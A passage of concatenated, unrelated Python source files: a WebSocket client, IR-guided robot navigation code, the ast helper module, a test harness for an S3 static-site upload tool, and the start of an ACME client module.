self.protocol = None
def on_connection_close(self):
if not self.connect_future.done():
self.connect_future.set_exception(StreamClosedError())
self.on_message(None)
self.tcp_client.close()
super(WebSocketClientConnection, self).on_connection_close()
def _on_http_response(self, response):
if not self.connect_future.done():
if response.error:
self.connect_future.set_exception(response.error)
else:
self.connect_future.set_exception(WebSocketError(
"Non-websocket response"))
def headers_received(self, start_line, headers):
if start_line.code != 101:
return super(WebSocketClientConnection, self).headers_received(
start_line, headers)
self.headers = headers
self.protocol = self.get_websocket_protocol()
self.protocol._process_server_headers(self.key, self.headers)
self.protocol._receive_frame()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = None
self.stream = self.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
# Once we've taken over the connection, clear the final callback
# we set on the http request. This deactivates the error handling
# in simple_httpclient that would otherwise interfere with our
# ability to see exceptions.
self.final_callback = None
self.connect_future.set_result(self)
def write_message(self, message, binary=False):
"""Sends a message to the WebSocket server."""
return self.protocol.write_message(message, binary)
def read_message(self, callback=None):
"""Reads a message from the WebSocket server.
If on_message_callback was specified at WebSocket
initialization, this function will never return messages
Returns a future whose result is the message, or None
if the connection is closed. If a callback argument
is given it will be called with the future when it is
ready.
"""
assert self.read_future is None
future = TracebackFuture()
if self.read_queue:
future.set_result(self.read_queue.popleft())
else:
self.read_future = future
if callback is not None:
self.io_loop.add_future(future, callback)
return future
def on_message(self, message):
if self._on_message_callback:
self._on_message_callback(message)
elif self.read_future is not None:
self.read_future.set_result(message)
self.read_future = None
else:
self.read_queue.append(message)
def on_pong(self, data):
pass
def get_websocket_protocol(self):
return WebSocketProtocol13(self, mask_outgoing=True,
compression_options=self.compression_options)
def websocket_connect(url, io_loop=None, callback=None, connect_timeout=None,
on_message_callback=None, compression_options=None):
"""Client-side websocket support.
Takes a url and returns a Future whose result is a
`WebSocketClientConnection`.
``compression_options`` is interpreted in the same way as the
return value of `.WebSocketHandler.get_compression_options`.
The connection supports two styles of operation. In the coroutine
style, the application typically calls
`~.WebSocketClientConnection.read_message` in a loop::
conn = yield websocket_connect(url)
while True:
msg = yield conn.read_message()
if msg is None: break
# Do something with msg
In the callback style, pass an ``on_message_callback`` to
``websocket_connect``. In both styles, a message of ``None``
indicates that the connection has been closed.
.. versionchanged:: 3.2
Also accepts ``HTTPRequest`` objects in place of urls.
.. versionchanged:: 4.1
Added ``compression_options`` and ``on_message_callback``.
The ``io_loop`` argument is deprecated.
"""
if io_loop is None:
io_loop = IOLoop.current()
if isinstance(url, httpclient.HTTPRequest):
assert connect_timeout is None
request = url
# Copy and convert the headers dict/object (see comments in
# AsyncHTTPClient.fetch)
request.headers = httputil.HTTPHeaders(request.headers)
else:
request = httpclient.HTTPRequest(url, connect_timeout=connect_timeout)
request = httpclient._RequestProxy(
request, httpclient.HTTPRequest._DEFAULTS)
conn = WebSocketClientConnection(io_loop, request,
on_message_callback=on_message_callback,
compression_options=compression_options)
if callback is not None:
io_loop.add_future(conn.connect_future, callback)
return conn.connect_future
|
|
from bot.hardware.IR import IR
from side import Side
from bot.driver.omni_driver import OmniDriver
import bot.lib.lib as lib
from time import sleep
from time import time
from pid import PID
import os.path
import yaml
bound = lambda x, l, u: l if x < l else u if x > u else x
MAX_VALUE = 800
class Navigation(object):
def __init__(self, rail_cars=0):
self.config = lib.get_config()
self.PID_values = self.config["IR_PID"]
self.device = IR() # INSTANTIATE ONLY ONCE
self.north = Side("North Left", "North Right", self.device.read_values, self.PID_values["North"]["diff"], self.PID_values["North"]["dist"])
self.south = Side("South Left", "South Right", self.device.read_values, self.PID_values["South"]["diff"], self.PID_values["South"]["dist"])
self.east = Side("East Top", "East Bottom", self.device.read_values, self.PID_values["East"]["diff"], self.PID_values["East"]["dist"])
self.west = Side("West Top", "West Bottom", self.device.read_values, self.PID_values["West"]["diff"], self.PID_values["West"]["dist"])
self.driver = OmniDriver()
self.sides = {"north": self.north,
"south": self.south,
"west": self.west,
"east": self.east}
self.moving = False
self.logger = lib.get_logger()
mapping = ["EXIT", "west", "east", "EXIT"]
self.rail_cars_side = mapping[rail_cars]
def stop_unused_motors(self, direction):
direction = direction.lower()
if direction == "north" or direction == "south":
self.driver.set_motor("north", 0)
self.driver.set_motor("south", 0)
elif direction == "east" or direction == "west":
self.driver.set_motor("east", 0)
self.driver.set_motor("west", 0)
@lib.api_call
def move_correct(self, direction, side, target, speed, timestep, threshold=1000000):
# speed >= 0
side = side.lower()
diff_err = self.sides[side].get_diff_correction( timestep, threshold)
# setting speed bounds
sne = bound(speed-diff_err, -100, 100)
# sne = -100 if sne < -100 else 100 if sne > 100 else sne
spe = bound(speed+diff_err, -100, 100)
#spe = -100 if spe < -100 else 100 if spe > 100 else spe
#self.logger.info("Error from PID : %d", diff_err)
dist_err = self.sides[side].get_dist_correction(target, timestep)
#self.logger.info("dist Error from PID : %d", dist_err)
dist_err = bound(dist_err, -100, 100)
if side == "north":
self.driver.set_motor("east", -dist_err)
self.driver.set_motor("west", -dist_err)
if direction == "west":
self.driver.set_motor("north", -spe)
self.driver.set_motor("south", -sne)
if direction == "east":
self.driver.set_motor("north", sne)
self.driver.set_motor("south", spe)
elif side == "south":
self.driver.set_motor("east", dist_err)
self.driver.set_motor("west", dist_err)
if direction == "west":
self.driver.set_motor("north", sne)
self.driver.set_motor("south", spe)
if direction == "east":
self.driver.set_motor("north", sne)
self.driver.set_motor("south", -spe)
elif side == "east":
self.driver.set_motor("north", -dist_err)
self.driver.set_motor("south", -dist_err)
if direction == "north":
self.driver.set_motor("west", sne)
self.driver.set_motor("east", spe)
elif direction == "south":
self.driver.set_motor("west", -spe)
self.driver.set_motor("east", -sne)
elif side == "west":
self.driver.set_motor("north", dist_err)
self.driver.set_motor("south", dist_err)
if direction == "north":
self.driver.set_motor("west", spe)
self.driver.set_motor("east", sne)
elif direction == "south":
self.driver.set_motor("west", -sne)
self.driver.set_motor("east", -spe)
else:
raise Exception()
def move_dead(self, direction, speed):
direction = direction.lower()
dirs = {"north": 0, "west": 90, "south": 180, "east": 270}
self.driver.move(speed, dirs[direction])
def drive_dead(self, direction, speed, duration):
self.move_dead(direction, speed)
sleep(duration)
self.stop()
@lib.api_call
def drive_along_wall(self, direction, side, duration):
time_elapsed = time()
final_time = time_elapsed + duration
while time_elapsed < final_time:
timestep = time()-time_elapsed
time_elapsed = time()
if direction == "west" or direction == "east":
self.move_correct(direction, side, 300, 65, timestep)
else:
self.move_correct(direction, side, 300, 50, timestep)
sleep(0.01)
self.stop()
@lib.api_call
def test(self):
#self.drive_along_wall("west", "north", 5)
self.move_until_wall("north", "east", 400)
@lib.api_call
def move_until_wall(self, direction, side, target, dist=150):
direction = direction.lower()
mov_side = self.sides[direction]
mov_target = dist
self.moving = True
time_elapsed = time()
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
self.move_correct(direction, side, mov_target, 60, timestep)
if mov_side.get_distance() <= target:
self.stop()
#TODO: Update the controller in this function
@lib.api_call
def move_smooth_until_wall(self, direction, side, target, dist=150, t_type="avg"):
direction = direction.lower()
mov_side = self.sides[direction]
mov_target = dist
self.moving = True
time_elapsed = time()
speed = 0
speed_pid = PID()
speed_pid.set_k_values(4, 0.01, 0)
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
speed = speed_pid.pid(0, target - mov_side.get_distance(), timestep)
if direction == "east" or direction == "west":
speed = bound(speed, -65, 65)
else:
speed = bound(speed, -65, 65)
self.move_correct(direction, side, mov_target, speed, timestep)
if mov_side.get_distance(t_type) <= target:
self.stop()
def move_to_position(self, x, y):
self.move_until_wall(self, "west", "north", x)
sleep(0.5)
self.move_until_wall(self, "north", "west", y)
sleep(0.5)
@lib.api_call
def stop(self):
self.driver.move(0)
self.moving = False
@lib.api_call
def set_PID_values(self, side_to_set, pid, kp, kd, ki):
set_side = self.sides[side_to_set]
if (pid == "diff"):
set_side.diff_pid.set_k_values(kp, kd, ki)
elif(pid == "dist"):
set_side.dist_pid.set_k_values(kp, kd, ki)
# write updated PID values to the IR_config file
# with open("IR_config.yaml") as f:
# a = yaml.load(f)
# a["IR_PID"][side_to_set][pid] = [kp, kd, ki]
# with open("IR_config.yaml", "w") as f:
# yaml.dump(a, f)
@lib.api_call
def read_IR_values(self):
self.logger.info("Test")
return self.device.read_values()
@lib.api_call
def move_until_color(self, direction, side, color):
direction = direction.lower()
mov_side = self.sides[direction]
self.logger.info
self.moving = True
time_elapsed = time()
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
self.move_correct(direction, side, 180, 55, timestep)
ir_values = mov_side.get_values()
# IR sensor for line detection is attached to South Left
ir_value = ir_values["South Left"]
if color == "white":
if ir_value >= 1000:
self.stop()
else:
if ir_value <= 1000:
self.stop()
@lib.api_call
def rotate_start(self):
ir_values = self.device.read_values()
# If North side is facing inner wall of tunnel rotate until East top can see inner wall.
while ir_values["East Bottom"] > 200 and ir_values["East Top"] > 200:
# counter clockwise
self.driver.rotate_t(60, .1)
sleep(.1)
ir_values = self.device.read_values()
self.logger.info("Now straightening out")
# Straighten out inside the tunnel
ir_values = self.device.read_values()
ir_diff = abs(ir_values["East Bottom"] - ir_values["East Top"])
while (ir_diff > 20):
if ir_values["East Bottom"] < ir_values["East Top"]:
# clockwise
self.driver.rotate_t(-60, .1)
sleep(0.1)
elif ir_values["East Bottom"] > ir_values["East Top"]:
# counter clockwise
self.driver.rotate_t(60, .1)
sleep(0.1)
else:
break
ir_values = self.device.read_values()
ir_diff = abs(ir_values["East Bottom"] - ir_values["East Top"])
@lib.api_call
def goto_top(self):
if self.east.get_distance() < MAX_VALUE:
self.move_smooth_until_wall("north", "east", 300)
elif self.west.get_distance() < MAX_VALUE:
self.move_smooth_until_wall("north", "west", 300)
@lib.api_call
def goto_railcar(self):
self.goto_top()
self.logger.info("Currently near barge")
if self.rail_cars_side == "west":
self.logger.info("Going west towards railcars")
self.move_smooth_until_wall("west", "north", 150, t_type="min")
elif self.rail_cars_side == "east":
self.logger.info("Going east towards railcars")
self.move_smooth_until_wall("east", "north", 150, t_type="min")
# TODO: Make a gotoBoat function
# go north towards block, then towards rail cars and straight down
def goto_boat(self):
self.goto_railcar()
if self.rail_cars_side == "west":
self.move_until_wall("south", "west", 200)
elif self.rail_cars_side == "east":
self.move_until_wall("south", "east", 200)
def goto_truck(self):
self.goto_top()
if self.rail_cars_side == "west":
self.move_until_wall("east", "north", 150)
if self.rail_cars_side == "east":
self.move_until_wall("west", "north", 150)
self.move_until_wall("south", "south", 150)
def goto_block_zone_A(self):
self.goto_railcar()
@lib.api_call
def goto_block_zone_B(self):
self.goto_top()
self.logger.info("sensor value: %d",self.east.get_distance())
self.logger.info("sensor value: %d", self.west.get_distance())
if self.east.get_distance() < MAX_VALUE:
self.logger.info("I'm on right side of course. Going to white line on my left")
self.move_until_color("west", "north", "white")
elif self.west.get_distance() < MAX_VALUE:
self.logger.info("I'm on left side of course. Going to white line on my right")
self.move_until_color("east", "north", "white")
self.logger.info("Reached Zone B")
@lib.api_call
def bang(self, side="north"):
self.drive_dead(side, 50, 0.5)
@lib.api_call
def get_off_wall(self):
self.drive_dead("south", 50, 0.333)
@lib.api_call
def correct_bang(self):
self.get_off_wall()
self.drive_dead("north", 50, 0.7)
self.logger.info("Aligned with barge")
@lib.api_call
def bang_railcar(self):
self.drive_dead(self.rail_cars_side, 60, 0.5)
@lib.api_call
def get_off_railcar(self):
if self.rail_cars_side == "east":
self.drive_dead("west", 60, 0.5)
else:
self.drive_dead("east", 60, 0.5)
@lib.api_call
def correct_bang_railcar(self):
self.get_off_railcar()
self.drive_dead(self.rail_cars_side, 60, 0.7)
self.logger.info("Aligned with railcars")
def goto_block_zone_C(self):
self.goto_top()
if self.rail_cars_side == "west":
self.move_until_wall("east", "north", 100)
if self.rail_cars_side == "east":
self.move_until_wall("west", "north", 100)
@lib.api_call
def set_bias(self, side, bias):
side = side.replace("_", " ")
self.device.set_bias(side,bias)
@lib.api_call
def get_sensor_value(self, value):
if "_" in value:
value = value.replace("_", " ")
try:
return self.read_IR_values()[value]
except KeyError:
self.logger.warning("Invalid Key for IR Values %s"%value)
#TODO: to be tested
@lib.api_call
def goto_next_railcar(self):
def avg(vals):
return sum(vals)/float(len(vals))
self.moving = True
speed = 50
sensor = "West Bottom"
last_value = self.get_sensor_value(sensor)
self.logger.info("sensor value: %d", last_value)
last_set = [last_value for i in xrange(10)]
time_elapsed = time()
self.move_dead("south", speed)
while self.moving:
timestep = time() - time_elapsed
time_elapsed = time()
curr_value = self.get_sensor_value(sensor)
self.logger.info("sensor Type: %s, sensor value: %d, avg: %d", sensor, curr_value, avg(last_set))
diff = curr_value - avg(last_set)
self.move_correct("south", self.rail_cars_side, 150, speed, timestep, threshold=100)
if diff > 50:
break
if sensor == "West Bottom":
sensor = "West Top"
speed = 35
last_set = [curr_value for i in xrange(10)]
else:
self.moving = False
break
last_set.pop(0)
last_set.append(curr_value)
sleep(0.01)
self.stop()
@lib.api_call
def drive_through_tunnel(self):
self.move_through_tunnel(-75 ,-75 ,75 ,90 ,.85)
sleep(.8)
self.logger.info("Climbed the tunnel")
self.rotate_start()
self.logger.info("Auto-corrected inside tunnel")
sleep(0.8)
if self.rail_cars_side == "west":
self.move_smooth_until_wall("north", "east", 500)
else:
self.move_smooth_until_wall("north", "west", 500)
self.logger.info("Reached the barge")
sleep(0.8)
@lib.api_call
def move_s(self, north=-100, south=-100, west=80, east=80):
self.driver.set_motor("east", east)
self.driver.set_motor("north", north)
self.driver.set_motor("south", south)
self.driver.set_motor("west", west)
@lib.api_call
def move_through_tunnel(self, north=-100, south=-100, west=80, east=80, duration=.75):
self.move_s(north,south,west,east)
sleep(duration)
self.stop()
|
|
"""
ast
~~~
The `ast` module helps Python applications to process trees of the Python
abstract syntax grammar. The abstract syntax itself might change with
each Python release; this module helps to find out programmatically what
the current grammar looks like and allows modifications of it.
An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as
a flag to the `compile()` builtin function or by using the `parse()`
function from this module. The result will be a tree of objects whose
classes all inherit from `ast.AST`.
A modified abstract syntax tree can be compiled into a Python code object
using the built-in `compile()` function.
Additionally various helper functions are provided that make working with
the trees simpler. The main intention of the helper functions and this
module in general is to provide an easy to use interface for libraries
that work tightly with the python syntax (template engines for example).
:copyright: Copyright 2008 by Armin Ronacher.
:license: Python License.
"""
from _ast import *
from _ast import __version__
def parse(source, filename='<unknown>', mode='exec'):
"""
Parse the source into an AST node.
Equivalent to compile(source, filename, mode, PyCF_ONLY_AST).
"""
return compile(source, filename, mode, PyCF_ONLY_AST)
def literal_eval(node_or_string):
"""
Safely evaluate an expression node or a string containing a Python
expression. The string or node provided may only consist of the following
Python literal structures: strings, numbers, tuples, lists, dicts, booleans,
and None.
"""
_safe_names = {'None': None, 'True': True, 'False': False}
if isinstance(node_or_string, str):
node_or_string = parse(node_or_string, mode='eval')
if isinstance(node_or_string, Expression):
node_or_string = node_or_string.body
def _convert(node):
if isinstance(node, (Str, Bytes)):
return node.s
elif isinstance(node, Num):
return node.n
elif isinstance(node, Tuple):
return tuple(map(_convert, node.elts))
elif isinstance(node, List):
return list(map(_convert, node.elts))
elif isinstance(node, Set):
return set(map(_convert, node.elts))
elif isinstance(node, Dict):
return dict((_convert(k), _convert(v)) for k, v
in zip(node.keys, node.values))
elif isinstance(node, Name):
if node.id in _safe_names:
return _safe_names[node.id]
elif isinstance(node, UnaryOp) and \
isinstance(node.op, (UAdd, USub)) and \
isinstance(node.operand, (Num, UnaryOp, BinOp)):
operand = _convert(node.operand)
if isinstance(node.op, UAdd):
return + operand
else:
return - operand
elif isinstance(node, BinOp) and \
isinstance(node.op, (Add, Sub)) and \
isinstance(node.right, (Num, UnaryOp, BinOp)) and \
isinstance(node.left, (Num, UnaryOp, BinOp)):
left = _convert(node.left)
right = _convert(node.right)
if isinstance(node.op, Add):
return left + right
else:
return left - right
raise ValueError('malformed node or string: ' + repr(node))
return _convert(node_or_string)
def dump(node, annotate_fields=True, include_attributes=False):
"""
Return a formatted dump of the tree in *node*. This is mainly useful for
debugging purposes. The returned string will show the names and the values
for fields. This makes the code impossible to evaluate, so if evaluation is
wanted *annotate_fields* must be set to False. Attributes such as line
numbers and column offsets are not dumped by default. If this is wanted,
*include_attributes* can be set to True.
"""
def _format(node):
if isinstance(node, AST):
fields = [(a, _format(b)) for a, b in iter_fields(node)]
rv = '%s(%s' % (node.__class__.__name__, ', '.join(
('%s=%s' % field for field in fields)
if annotate_fields else
(b for a, b in fields)
))
if include_attributes and node._attributes:
rv += fields and ', ' or ' '
rv += ', '.join('%s=%s' % (a, _format(getattr(node, a)))
for a in node._attributes)
return rv + ')'
elif isinstance(node, list):
return '[%s]' % ', '.join(_format(x) for x in node)
return repr(node)
if not isinstance(node, AST):
raise TypeError('expected AST, got %r' % node.__class__.__name__)
return _format(node)
def copy_location(new_node, old_node):
"""
Copy source location (`lineno` and `col_offset` attributes) from
*old_node* to *new_node* if possible, and return *new_node*.
"""
for attr in 'lineno', 'col_offset':
if attr in old_node._attributes and attr in new_node._attributes \
and hasattr(old_node, attr):
setattr(new_node, attr, getattr(old_node, attr))
return new_node
def fix_missing_locations(node):
"""
When you compile a node tree with compile(), the compiler expects lineno and
col_offset attributes for every node that supports them. This is rather
tedious to fill in for generated nodes, so this helper adds these attributes
recursively where not already set, by setting them to the values of the
parent node. It works recursively starting at *node*.
"""
def _fix(node, lineno, col_offset):
if 'lineno' in node._attributes:
if not hasattr(node, 'lineno'):
node.lineno = lineno
else:
lineno = node.lineno
if 'col_offset' in node._attributes:
if not hasattr(node, 'col_offset'):
node.col_offset = col_offset
else:
col_offset = node.col_offset
for child in iter_child_nodes(node):
_fix(child, lineno, col_offset)
_fix(node, 1, 0)
return node
def increment_lineno(node, n=1):
"""
Increment the line number of each node in the tree starting at *node* by *n*.
This is useful to "move code" to a different location in a file.
"""
for child in walk(node):
if 'lineno' in child._attributes:
child.lineno = getattr(child, 'lineno', 0) + n
return node
def iter_fields(node):
"""
Yield a tuple of ``(fieldname, value)`` for each field in ``node._fields``
that is present on *node*.
"""
for field in node._fields:
try:
yield field, getattr(node, field)
except AttributeError:
pass
def iter_child_nodes(node):
"""
Yield all direct child nodes of *node*, that is, all fields that are nodes
and all items of fields that are lists of nodes.
"""
for name, field in iter_fields(node):
if isinstance(field, AST):
yield field
elif isinstance(field, list):
for item in field:
if isinstance(item, AST):
yield item
def get_docstring(node, clean=True):
"""
Return the docstring for the given node or None if no docstring can
be found. If the node provided does not have docstrings a TypeError
will be raised.
"""
if not isinstance(node, (FunctionDef, ClassDef, Module)):
raise TypeError("%r can't have docstrings" % node.__class__.__name__)
if node.body and isinstance(node.body[0], Expr) and \
isinstance(node.body[0].value, Str):
if clean:
import inspect
return inspect.cleandoc(node.body[0].value.s)
return node.body[0].value.s
def walk(node):
"""
Recursively yield all descendant nodes in the tree starting at *node*
(including *node* itself), in no specified order. This is useful if you
only want to modify nodes in place and don't care about the context.
"""
from collections import deque
todo = deque([node])
while todo:
node = todo.popleft()
todo.extend(iter_child_nodes(node))
yield node
class NodeVisitor(object):
"""
A node visitor base class that walks the abstract syntax tree and calls a
visitor function for every node found. This function may return a value
which is forwarded by the `visit` method.
This class is meant to be subclassed, with the subclass adding visitor
methods.
Per default the visitor functions for the nodes are ``'visit_'`` +
class name of the node. So a `TryFinally` node visit function would
be `visit_TryFinally`. This behavior can be changed by overriding
the `visit` method. If no visitor function exists for a node
(return value `None`) the `generic_visit` visitor is used instead.
Don't use the `NodeVisitor` if you want to apply changes to nodes during
traversing. For this a special visitor exists (`NodeTransformer`) that
allows modifications.
"""
def visit(self, node):
"""Visit a node."""
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
return visitor(node)
def generic_visit(self, node):
"""Called if no explicit visitor function exists for a node."""
for field, value in iter_fields(node):
if isinstance(value, list):
for item in value:
if isinstance(item, AST):
self.visit(item)
elif isinstance(value, AST):
self.visit(value)
class NodeTransformer(NodeVisitor):
"""
A :class:`NodeVisitor` subclass that walks the abstract syntax tree and
allows modification of nodes.
The `NodeTransformer` will walk the AST and use the return value of the
visitor methods to replace or remove the old node. If the return value of
the visitor method is ``None``, the node will be removed from its location,
otherwise it is replaced with the return value. The return value may be the
original node in which case no replacement takes place.
Here is an example transformer that rewrites all occurrences of name lookups
(``foo``) to ``data['foo']``::
class RewriteName(NodeTransformer):
def visit_Name(self, node):
return copy_location(Subscript(
value=Name(id='data', ctx=Load()),
slice=Index(value=Str(s=node.id)),
ctx=node.ctx
), node)
Keep in mind that if the node you're operating on has child nodes you must
either transform the child nodes yourself or call the :meth:`generic_visit`
method for the node first.
For nodes that were part of a collection of statements (that applies to all
statement nodes), the visitor may also return a list of nodes rather than
just a single node.
Usually you use the transformer like this::
node = YourTransformer().visit(node)
"""
def generic_visit(self, node):
for field, old_value in iter_fields(node):
old_value = getattr(node, field, None)
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, AST):
value = self.visit(value)
if value is None:
continue
elif not isinstance(value, AST):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, AST):
new_node = self.visit(old_value)
if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
|
|
#!/usr/bin/env python
import os
import subprocess
from staticbuilder import StaticBuilder
def test():
"""
Test harness for static builder.
Checks SB both as imported object and command line utility.
Test paths must be set up correctly:
(TODO: create setup function to automate directory/file creation)
"""
command_line_test = True
object_test = True
# TEST COMMAND LINE
if command_line_test:
print "Testing SB from the command line"
# Test bad local path.
print "Testing bad local path"
cmd = "python staticbuilder.py \
~/projects/staticbuilder/sb_test_bucket/no_file.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test invalid location.
print "Testing invalid location"
cmd = "python staticbuilder.py \
-p invalid_location \
~/projects/staticbuilder/sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test that an absolute file path in works.
print "Testing single in path, absolute."
cmd = "python staticbuilder.py \
/Users/scottyoung/projects/staticbuilder/sb_test_bucket/testfile0.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that a relative file path in works.
print "Testing single in path, relative."
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testfile1.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that out path works.
print "Testing out path."
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testfile1.txt sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that two in-paths work.
print "Testing two in paths."
cmd = "python staticbuilder.py \
sb_test_bucket/testfile2in1.txt \
sb_test_bucket/testfile2in2.txt \
sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that three in-paths work - no more after this!.
print "Testing three in paths."
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testfile3in1.txt \
sb_test_bucket/testdir1/testfile3in2.txt \
sb_test_bucket/testfile3in3.txt \
sb_test_bucket/testdir1/"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test for a single directory in
print "Testing single directory in - no recursion"
cmd = "python staticbuilder.py \
sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test for a single sub directory recursive
print "Testing single directory in - with recursion"
cmd = "python staticbuilder.py -r \
sb_test_bucket/testdir1"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test a directory with out path - not recursive
print "Testing directory - no recursion"
cmd = "python staticbuilder.py \
sb_test_bucket/testdir1/testdir2 \
sb_test_bucket/testdir1/testdir2"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test a directory with out path - recursive
print "Testing directory - with recursion"
cmd = "python staticbuilder.py -r \
sb_test_bucket/testdir1/testdir2 \
sb_test_bucket/testdir1/testdir2"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test deletion of a file
print "Testing deletion of a file"
cmd = "python staticbuilder.py -f \
-d sb_test_bucket/testfile0.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test deletion of a directory
print "Testing deletion of a file"
cmd = "python staticbuilder.py -f -r \
-d sb_test_bucket/testdir1"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test no arguments - should upload cwd
print "Testing no arguments - no recursion"
os.chdir("sb_test_bucket")
cmd = "python ../staticbuilder.py"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test no arguments with recursion
print "Testing no arguments - with recursion"
cmd = "python ../staticbuilder.py -R"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test list bad bucket name
print "Testing option -l buckets with bad bucket name"
os.chdir("..")
cmd = "python staticbuilder.py -l no_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test that SB can list all buckets
print "Testing option -l buckets (list buckets)"
cmd = "python staticbuilder.py -l buckets"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that SB can list all keys in a bucket
print "Testing option -l sb_test_bucket (list all keys in bucket)"
cmd = "python staticbuilder.py -l sb_test_bucket"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test that SB can list filtered keys
print "Testing option -l sb_test_bucket/testdir1 (list all keys in directory)"
cmd = "python staticbuilder.py -l sb_test_bucket/testdir1"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test rename with too few arguments errors
print "Testing option -n with 0 args"
cmd = "python staticbuilder.py -n new_name.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test rename with too many arguments errors
print "Testing option -n with 3 args"
cmd = "python staticbuilder.py -N new_name.text file1.txt file2.txt path/out "
ret = subprocess.call(cmd, shell=True)
assert ret == 2
# Test rename
print "Testing option -n (rename)"
cmd = "python staticbuilder.py --name new_name.txt sb_test_bucket/testfile0.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test metadata
print "Testing option -m (metadata)"
cmd = "python staticbuilder.py -m kick:ass sb_test_bucket/metadata.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
# Test acl
print "Testing option -a (acl)"
cmd = "python staticbuilder.py -a public-read sb_test_bucket/public.txt"
ret = subprocess.call(cmd, shell=True)
assert ret == 0
print "Complete SB test from command line."
##########################################
if object_test:
# TEST OBJECT
print "Testing SB as an object"
options = None
sb = StaticBuilder(options)
# Test bad local path.
print "Testing bad local path"
try:
sb.upload("~/projects/staticbuilder/st_test_bucket/file0.txt")
except SystemExit, e:
print e.code
assert e.code == 2
except Exception, e:
print "Unexpected Exception with bad local path."
else:
print "No exception raised with bad local path"
#sb = StaticBuilder(options)
# Test that an absolute file path in works.
print "Testing single in path, absolute."
sb.upload("/Users/scottyoung/projects/staticbuilder/sb_test_bucket/testfile0.txt")
# Test that a relative file path in works.
print "Testing single in path, relative."
sb.upload("sb_test_bucket/testdir1/testfile1.txt")
# Test that out path works.
print "Testing out path."
sb.upload("sb_test_bucket/testdir1/testfile1.txt", "sb_test_bucket")
# Test that two in-paths work.
print "Testing two in paths."
paths_in = ["sb_test_bucket/testfile2in1.txt", "sb_test_bucket/testfile2in2.txt"]
sb.upload(paths_in, "sb_test_bucket")
# Test that three in-paths work - no more after this!.
print "Testing three in paths."
paths_in = ["sb_test_bucket/testdir1/testfile3in1.txt", "sb_test_bucket/testdir1/testfile3in2.txt",
"sb_test_bucket/testfile3in3.txt"]
sb.upload(paths_in, "sb_test_bucket/testdir1/")
# Test for a single directory in
print "Testing single directory in - no recursion"
sb.upload("sb_test_bucket")
# Test for a single sub directory recursive
print "Testing single directory in - with recursion"
sb.upload("sb_test_bucket/testdir1", recursive=True)
# Test a directory with out_path - not recursive
print "Testing directory - no recursion"
sb.upload("sb_test_bucket/testdir1/testdir2", "sb_test_bucket/testdir1/testdir2")
# Test a directory with out_path - recursive
print "Testing directory - with recursion"
sb.upload("sb_test_bucket/testdir1/testdir2", "sb_test_bucket/testdir1/testdir2", recursive=True)
# Test deletion of a file
print "Testing deletion of a file"
sb.delete("sb_test_bucket/testfile0.txt", force=True)
# Test deletion of a directory
print "Testing deletion of a file"
sb.delete("sb_test_bucket/testdir1", force=True, recursive=True)
# Test no arguments - should upload cwd
print "Testing no arguments - no recursion"
os.chdir("sb_test_bucket")
sb.upload()
# Test no arguments with recursion
print "Testing no arguments - with recursion"
sb.upload(recursive=True)
# Test list bad bucket name
print "Testing option -l buckets (list buckets)"
os.chdir("..")
# Test that SB can list all buckets
print "Testing listBuckets"
sb.listBuckets()
# Test that SB can list all keys in a bucket
print "Testing option -l sb_test_bucket (list all keys in bucket)"
sb.listKeys("sb_test_bucket")
# Test that SB can list filtered keys
print "Testing option -l sb_test_bucket/testdir1 (list all keys in directory)"
sb.listKeys("sb_test_bucket/testdir1")
# Test rename with too few arguments errors
print "Testing name with too few args"
try:
sb.upload(name="new_name.txt")
except SystemExit, e:
assert e.code == 2
except Exception, e:
print "Unexpected Exception with 1 arg for name."
else:
print "No exception raised with 1 arg for name"
# Test rename with too many arguments errors
print "Testing name with too many args"
paths_in = ["sb_test_bucket/testfile2in1.txt", "sb_test_bucket/testfile2in2.txt"]
try:
sb.upload(paths_in=paths_in, name="new_name.txt")
except SystemExit, e:
assert e.code == 2
except Exception, e:
print "Unexpected Exception with 3 args for name."
else:
print "No exception raised with 3 args for name"
# Test rename
print "Testing option name"
sb.upload("sb_test_bucket/testfile0.txt", name="new_name.txt")
# Test metadata
print "Testing option -m (metadata)"
meta = {'kick':'ass'}
sb.upload("sb_test_bucket/metadata.txt", metadata=meta)
# Test acl
print "Testing option -a (acl)"
sb.set_acl("sb_test_bucket/public.txt", "public-read")
print "Complete SB object test."
if __name__ == "__main__":
test()
|
|
"""ACME client API."""
import datetime
import heapq
import logging
import time
import six
